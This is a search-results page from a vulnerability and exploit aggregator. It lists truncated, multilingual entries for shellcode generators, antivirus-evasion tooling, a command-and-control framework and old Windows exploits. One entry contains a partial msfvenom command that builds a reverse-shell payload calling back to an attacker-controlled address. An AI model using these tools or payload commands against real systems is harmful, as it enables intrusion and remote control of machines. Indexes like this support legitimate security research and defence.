Lucene search
+L

24 matches found

Kitploit
Kitploit
added 2026/09/20 6:39 a.m.14 views

micr0_shell

micr0 shell Micr0shell es un script ligero y eficiente en Python diseñado para generar dinámicamente shellcode de reverse shell independiente de posición PIC libre de nulos para Windows X64. Dependiendo de las opciones seleccionadas, el shellcode generado puede ser hasta 27 bytes más pequeño que ...

5.8AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/20 5:12 a.m.7 views

OffensivePipeline

OffensivePipeline OffensivePipeline 允许你下载并构建 C 工具,在构建过程中应用特定修改,以提高其在红队演练中的逃逸能力。 OffensivePipeline 的常见用途是从 Git 仓库下载工具,对项目中的某些值进行随机化,构建它,混淆生成的二进制文件,并生成 shellcode。 特性 目前仅支持 C(.Net Framework)项目 允许克隆公共和私有(你需要凭据 :D)Git 仓库 允许使用本地文件夹 随机化项目 GUID 随机化 AssemblyInfo 中包含的应用程序信息 构建 C 项目 混淆生成的二进制文件 从二进制文件生成...

5.9AI score
SaveExploits0References15
Kitploit
Kitploit
added 2026/09/20 1:22 a.m.7 views

Ninja

快速更新,包含 Follina 利用(2022-06-01)- NinjaC2 将生成文档并提供 HTML 负载。 更多信息:https://www.linkedin.com/posts/ahmed-khlief-499321a7i-just-pushed-a-quick-update-to-ninjac2-to-activity-6937661951007170560-Tmps Ninja V2.2 发布(2022-03-27)。 新功能包括: 查看 URL 获取功能详情以及如何使用 AWS EC2 自动化: 1. CNC 脚本的新用户界面 2...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/19 8:24 p.m.12 views

sickle-pdk

Sickle - Payload Development Kit Sickle is a tool I originally developed to help me be more effective, in both developing and understanding shellcode. However, throughout the course of its development and usage It has evolved into a payload development kit. Although current modules are mostly aim...

6.3AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/19 8:11 p.m.14 views

astroid

ASTROID v 1.2 root@kitploit: 作者: Mascerano Bachir dev-labs 法律免责声明: root@kitploit: 作者对该工具的任何不良使用概不负责,请记住这仅用于教育目的。 描述: root@kitploit: 该工具使用 Metasploit 生成 Shellcode,通过 Avet 解码并编译为 EXE 文件 截图: 依赖项: root@kitploit: 1 - meta sploit-framework 2 - xterm 3 - Wine 4 - MinGW EXE 5 - avet 下载/配置/使用:...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/19 5:49 p.m.10 views

ShellcodeCompiler

Shellcode 编译器 Shellcode 编译器是一个程序,可将 C/C++ 风格代码编译成针对 Windows(x86 和 x64)和 Linux(x86 和 x64)的小型、位置无关且不含 NULL 字节的 shellcode。它允许以用户友好的方式调用任何 Windows API 函数或 Linux 系统调用。 Shellcode 编译器接收一个源文件作为输入,并使用自己的编译器解释代码并生成汇编文件,然后使用 Keystone 引擎进行汇编。 命令行选项 root@kitploit: -h --help : 显示此帮助信息 -p --platform : Shellcode...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/19 5:12 p.m.741 views

nccfsas

Introduction This repository holds information released publicly by NCC Group's Full Spectrum Attack Simulation FSAS team...

5.3AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/19 11:10 a.m.6 views

ZSC

OWASP ZSC 本软件旨在挑战反病毒技术、研究新的加密方法,并保护包含重要数据的敏感开源文件。贡献者及OWASP基金会不对任何非法使用行为负责。 OWASP ZSC 是一款用 Python 编写的开源软件,可让您生成自定义 shellcode 并将脚本转换为混淆脚本。该软件可在 Windows/Linux/OSX 系统上通过 Python 运行。 OWASP 页面:https://www.owasp.org/index.php/OWASPZSCToolProject 文档:https://www.gitbook.com/book/ali-razmjoo/owasp-zsc/detai...

5.8AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/19 10:06 a.m.38 views

shellsploit-framework

We'll back in several years. update...

5.3AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/16 12:35 p.m.12 views

MS08-067

MS08-067 | CVE-2008-4250 Referencia: https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067?redirectedfrom=MSDN Generación del Shellcode Usaremos msfvenom para generar el shellcode. root@kitploit: msfvenom -p windows/shellreversetcp LHOST=10.10.14.14 LPORT=443...

10CVSS8.3AI score0.98751EPSS
SaveExploits18
GithubExploit
GithubExploit
added 2026/06/04 12:47 a.m.122 views

wined

Windows Exploitation wined Tools The following scripts were...

5.8AI score
SaveExploits0
GithubExploit
GithubExploit
added 2025/10/08 12:49 p.m.163 views

LabExploit

LiveExploit SECURITY RESEARCH TOOL - USE RESPONSIBLY A...

7.6AI score
SaveExploits0
GithubExploit
GithubExploit
added 2024/04/22 11:33 p.m.374 views

Exploit for Improper Ownership Management in Debian Debian_Linux

Install compilation environment bash sudo apt install -y gcc...

7.8CVSS7AI score0.0788EPSS
SaveExploits15
Gitee
Gitee
added 2019/10/27 9:47 p.m.11 views

PSKernel-Primitives

This repository, zdiskless/PSKernel-Primitives, is a collection of PowerShell primitives for exploitation. The code includes various functions for generating shellcode, allocating memory, and interacting with the Windows kernel. The functions in this repository are designed to be used in...

7AI score
SaveExploits0
zdt
zdt
added 2019/03/19 12:00 a.m.105 views

Advanced Host Monitor 11.92 beta - Local Buffer Overflow Exploit

Exploit for windows platform in category local exploits !/usr/bin/env python ------------------------------------------------------------------------------------------------------------------------------------ Exploit: Advanced Host Monitor 11.92 beta - Local Buffer Overflow EggHunter Date:...

7.2AI score
SaveExploits0
zdt
zdt
added 2018/04/11 12:00 a.m.176 views

Linux/x64 - x64 Assembly Shellcode (Generator)

!/usr/bin/env python Features: - Linux shellcode x64 assembly code generation - stack based smaller payload size - execve based - supports long commands meaning bigger than an x64 register - 64 bits - supports long parameters meaning bigger than an x64 register - 64 bits - one command only execve...

0.3AI score
SaveExploits0
FireEye
FireEye
added 2017/03/03 8:00 a.m.18 views

AntiVirus Evasion Reconstructed – Veil 3.0

The Veil Framework is a collection of tools designed for use during offensive security testing. When the time calls for it, Mandiant’s Red Team will use the Veil-Framework to help achieve their objective. The most commonly used tool is Veil-Evasion, which can turn an arbitrary script or piece of...

7.1AI score
SaveExploits0
FireEye
FireEye
added 2017/03/03 8:00 a.m.23 views

AntiVirus Evasion Reconstructed – Veil 3.0

The Veil Framework is a collection of tools designed for use during offensive security testing. When the time calls for it, Mandiant’s Red Team will use the Veil-Framework to help achieve their objective. The most commonly used tool is Veil-Evasion, which can turn an arbitrary script or piece of...

7.3AI score
SaveExploits0
Exploit DB
Exploit DB
added 2015/04/08 12:00 a.m.22 views

Linux x86 - Typewriter Shellcode Generator

Linux x86 - Typewriter Shellcode Generator. Shellcode exploit for linx86 platform !/usr/bin/env python Typewriter Shellcode Generator Paw Petersen, SLAE-656 https://www.pawpetersen.dk/typewriter-shellcode-generator-linux-x86/ import sys,struct string = sys.argv1 length = struct.pack"= lenstring: ...

7.4AI score
SaveExploits0
Binamuse
Binamuse
added 2013/01/09 3:57 a.m.509 views

About shellcodes

In this post we have documented a beginners introduction to shellcode writing. We go from zero to a super simple shellcode using tools you may find already installed in any serious operating system. If you are looking for a digested and more mature way of generating shellcode you should check...

6.9AI score
SaveExploits0
Rows per page
Query Builder